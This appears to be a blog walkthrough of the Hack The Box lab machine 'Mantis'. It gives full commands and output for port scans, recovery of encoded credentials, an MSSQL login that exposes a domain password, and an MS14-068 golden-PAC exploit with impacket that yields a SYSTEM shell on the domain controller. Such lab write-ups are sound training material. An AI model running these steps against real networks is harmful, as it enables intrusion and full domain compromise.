In this blog we will take a look at walkthrough for a Hackthebox machine called Mantis
Executive Summary
Initial Exploitation
The initial exploitation was from an encoded password in the webpage that led to discovery for more encoded credentials for MSSQL
Then enumerating the MSSQL database we found a cleartext credentials for a domain joined user, that led to the initial shell
Privilege Escalation
We gained domain-admin privileges by faking the PAC in the AD. That led the attacker to impersonate the user with high privileges which led to the compromise of the domain controller
Enumeration
Nmap Service Scan
root@kali ~/h/mantis# nmap -p 53,88,135,139,389,445,464,593,636,1337,1433,3268,3269,5722,8080,9389,10475,26347,49152,49153,49154,49155,49157,49158,49164,49165,49171,50255 -sC -sV 10.10.10.52
Starting Nmap 7.92 ( https://nmap.org ) at 2022-06-29 01:41 EDT
Nmap scan report for 10.10.10.52
Host is up (0.12s latency).
PORT STATE SERVICE VERSION
53/tcp open domain Microsoft DNS 6.1.7601 (1DB15CD4) (Windows Server 2008 R2 SP1)
| dns-nsid:
|_ bind.version: Microsoft DNS 6.1.7601 (1DB15CD4)
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2022-06-29 05:41:26Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: htb.local, Site: Default-First-Site-Name)
445/tcp open microsoft-ds Windows Server 2008 R2 Standard 7601 Service Pack 1 microsoft-ds (workgroup: HTB)
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
1337/tcp open http Microsoft IIS httpd 7.5
|_http-server-header: Microsoft-IIS/7.5
| http-methods:
|_ Potentially risky methods: TRACE
|_http-title: IIS7
1433/tcp open ms-sql-s Microsoft SQL Server 2014 12.00.2000.00; RTM
| ms-sql-ntlm-info:
| Target_Name: HTB
| NetBIOS_Domain_Name: HTB
| NetBIOS_Computer_Name: MANTIS
| DNS_Domain_Name: htb.local
| DNS_Computer_Name: mantis.htb.local
|_ Product_Version: 6.1.7601
|_ssl-date: 2022-06-29T05:42:32+00:00; +4s from scanner time.
| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback
| Not valid before: 2022-06-29T05:21:55
|_Not valid after: 2052-06-29T05:21:55
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: htb.local, Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
5722/tcp open msrpc Microsoft Windows RPC
8080/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-IIS/7.5
|_http-title: Tossed Salad - Blog
9389/tcp open mc-nmf .NET Message Framing
10475/tcp closed unknown
26347/tcp closed unknown
49152/tcp open msrpc Microsoft Windows RPC
49153/tcp open msrpc Microsoft Windows RPC
49154/tcp open msrpc Microsoft Windows RPC
49155/tcp open msrpc Microsoft Windows RPC
49157/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49158/tcp open msrpc Microsoft Windows RPC
49164/tcp closed unknown
49165/tcp closed unknown
49171/tcp closed unknown
50255/tcp open ms-sql-s Microsoft SQL Server 2014 12.00.2000
| ms-sql-ntlm-info:
| Target_Name: HTB
| NetBIOS_Domain_Name: HTB
| NetBIOS_Computer_Name: MANTIS
| DNS_Domain_Name: htb.local
| DNS_Computer_Name: mantis.htb.local
|_ Product_Version: 6.1.7601
|_ssl-date: 2022-06-29T05:42:32+00:00; +4s from scanner time.
| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback
| Not valid before: 2022-06-29T05:21:55
|_Not valid after: 2052-06-29T05:21:55
Service Info: Host: MANTIS; OS: Windows; CPE: cpe:/o:microsoft:windows_server_2008:r2:sp1, cpe:/o:microsoft:windows
Host script results:
| smb-security-mode:
| account_used: <blank>
| authentication_level: user
| challenge_response: supported
|_ message_signing: required
|_clock-skew: mean: 34m21s, deviation: 1h30m43s, median: 3s
| smb-os-discovery:
| OS: Windows Server 2008 R2 Standard 7601 Service Pack 1 (Windows Server 2008 R2 Standard 6.1)
| OS CPE: cpe:/o:microsoft:windows_server_2008::sp1
| Computer name: mantis
| NetBIOS computer name: MANTIS\x00
| Domain name: htb.local
| Forest name: htb.local
| FQDN: mantis.htb.local
|_ System time: 2022-06-29T01:42:23-04:00
| smb2-time:
| date: 2022-06-29T05:42:24
|_ start_date: 2022-06-29T05:20:25
| ms-sql-info:
| 10.10.10.52:1433:
| Version:
| name: Microsoft SQL Server 2014 RTM
| number: 12.00.2000.00
| Product: Microsoft SQL Server 2014
| Service pack level: RTM
| Post-SP patches applied: false
|_ TCP port: 1433
| smb2-security-mode:
| 2.1:
|_ Message signing enabled and required
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 78.41 seconds
Nmap Full Port Scan
root@kali ~/h/mantis# nmap -p- --min-rate 10000 10.10.10.52
Starting Nmap 7.92 ( https://nmap.org ) at 2022-06-29 01:24 EDT
Warning: 10.10.10.52 giving up on port because retransmission cap hit (10).
Nmap scan report for 10.10.10.52
Host is up (0.12s latency).
Not shown: 65488 closed tcp ports (reset)
PORT STATE SERVICE
53/tcp open domain
88/tcp open kerberos-sec
135/tcp open msrpc
139/tcp open netbios-ssn
389/tcp open ldap
445/tcp open microsoft-ds
464/tcp open kpasswd5
593/tcp open http-rpc-epmap
636/tcp open ldapssl
1337/tcp open waste
1433/tcp open ms-sql-s
3268/tcp open globalcatLDAP
3269/tcp open globalcatLDAPssl
5722/tcp open msdfsr
8080/tcp open http-proxy
9389/tcp open adws
10815/tcp filtered unknown
10955/tcp filtered unknown
16140/tcp filtered unknown
17498/tcp filtered unknown
17739/tcp filtered unknown
24594/tcp filtered unknown
28049/tcp filtered unknown
31078/tcp filtered unknown
32215/tcp filtered unknown
33450/tcp filtered unknown
36143/tcp filtered unknown
36553/tcp filtered unknown
41599/tcp filtered unknown
42798/tcp filtered unknown
45124/tcp filtered unknown
46940/tcp filtered unknown
47001/tcp open winrm
49152/tcp open unknown
49153/tcp open unknown
49154/tcp open unknown
49155/tcp open unknown
49157/tcp open unknown
49158/tcp open unknown
49167/tcp open unknown
49178/tcp open unknown
49182/tcp open unknown
50255/tcp open unknown
50358/tcp filtered unknown
55892/tcp filtered unknown
58869/tcp filtered unknown
61491/tcp filtered unknown
Nmap done: 1 IP address (1 host up) scanned in 15.50 seconds
Port 88 Kerberos
As per the nmap scan the domain name is htb.local, add this to hosts file. Enumerating valid users in the domain using kerberute
root@kali ~/h/mantis# gobuster dir -u http://10.10.10.52:1337 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 40
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://10.10.10.52:1337
[+] Method: GET
[+] Threads: 40
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.1.0
[+] Timeout: 10s
===============================================================
2022/06/29 01:54:04 Starting gobuster in directory enumeration mode
===============================================================
/orchard (Status: 500) [Size: 3026]
/secure_notes (Status: 301) [Size: 160] [--> http://10.10.10.52:1337/secure_notes/]
We have an interesting find -> secure_notes
It has a txt file with a long string as a filename
If we scrolled to the bottom
Credentials stored in secure format
OrchardCMS admin creadentials 010000000110010001101101001000010110111001011111010100000100000001110011011100110101011100110000011100100110010000100001
SQL Server sa credentials file namez
There is a long encoded password. Cracking it with using perl
Credentials stored in secure format
OrchardCMS admin creadentials 010000000110010001101101001000010110111001011111010100000100000001110011011100110101011100110000011100100110010000100001
SQL Server sa credentials file namez
IAble to login http://10.10.10.52:8080/admin using the creds admin / @dm!n_P@ssW0rd! . I actually played with the Orchard Admin panel for a while, but surprisingly wasn’t able to get RCE from it
For SQL Server, the notes is about the file name, and this one has some base64 inside of it, dev_notes_NmQyNDI0NzE2YzVmNTM0MDVmNTA0MDczNzM1NzMwNzI2NDIx.txt.txt. That decodes to a string of hex.
We got another set of password specially for MSSQL
Exploitation
MSSQL Enumeration
Now we have the credentials for user admin, using mssqlient from impacket to get access to the database
root@kali ~/h/mantis# impacket- mssqlclient 'admin:m$$ql_S@_P@ssW0rd!@10.10.10.52'
Impacket v0.9.21 - Copyright 2020 SecureAuth Corporation
[*] Encryption required, switching to TLS
[*] ENVCHANGE(DATABASE): Old Value: master, New Value: master
[*] ENVCHANGE(LANGUAGE): Old Value: None, New Value: us_english
[*] ENVCHANGE(PACKETSIZE): Old Value: 4096, New Value: 16192
[*] INFO(MANTIS\SQLEXPRESS): Line 1: Changed database context to 'master'.
[*] INFO(MANTIS\SQLEXPRESS): Line 1: Changed language setting to us_english.
[*] ACK: Result: 1 - Microsoft SQL Server (120 7208)
[!] Press help for extra shell commands
SQL>
Now we will start our enumeration. First listing and selecting the databse
SQL> SELECT name FROM master.dbo.sysdatabases
name
--------------------------------------------------------------------------------------------------------------------------------
master
tempdb
model
msdb
orcharddb
SQL> use orcharddb
[*] ENVCHANGE(DATABASE): Old Value: master, New Value: orcharddb
[*] INFO(MANTIS\SQLEXPRESS): Line 1: Changed database context to 'orcharddb'.
We are inside the orcharddb, list the columns
SQL> SELECT * FROM INFORMATION_SCHEMA.TABLES; # To list the tables
We found an interesting table called -> blog_Orchard_Users_UserPartRecord
SQL> SELECT COLUMN_NAME 'All_Columns' FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME='blog_Orchard_Users_UserPartRecord'
All_Columns
--------------------------------------------------------------------------------------------------------------------------------
Id
UserName
Email
NormalizedUserName
Password
PasswordFormat
HashAlgorithm
PasswordSalt
RegistrationStatus
EmailStatus
EmailChallengeToken
CreatedUtc
LastLoginUtc
LastLogoutUtc
It has two columns -> username, password
SQL> select UserName,Password from blog_Orchard_Users_UserPartRecord
UserName Password
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
admin AL1337E2D6YHm0iIysVzG8LA76OozgMSlyOJk1Ov5WCGK+lgKY6vrQuswfWHKZn2+A==
James J@m3s_P@ssW0rd!
We have the credentials for user james - J@m3s_P@ssW0rd!
Privilege Escalation
Now that we already know that the username james is domain-joined. There is a critical vulnerability in Windows DCs that allow a simple user to get a Golden ticket without being an admin called as MS14-068.
If you want to know more about it, I've written a blog on it. Kindly refer it for better understanding
To exploit this vulnerability we will utilize impacket script called godlenpac.py. Kali linux already has an in-build binary for that called -> impacket-goldenPac
root@kali ~/h/mantis# impacket-goldenPac -dc-ip 10.10.10.52 -target-ip 10.10.10.52 htb.local/James@mantis.htb.local
Impacket v0.9.24 - Copyright 2021 SecureAuth Corporation
Password:
[*] User SID: S-1-5-21-4220043660-4019079961-2895681657-1103
[*] Forest SID: S-1-5-21-4220043660-4019079961-2895681657
[*] Attacking domain controller 10.10.10.52
[*] 10.10.10.52 found vulnerable!
[*] Requesting shares on 10.10.10.52.....
[*] Found writable share ADMIN$
[*] Uploading file XQisLrtc.exe
[*] Opening SVCManager on 10.10.10.52.....
[*] Creating service zywl on 10.10.10.52.....
[*] Starting service zywl.....
[!] Press help for extra shell commands
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.
C:\Windows\system32>whoami
nt authority\system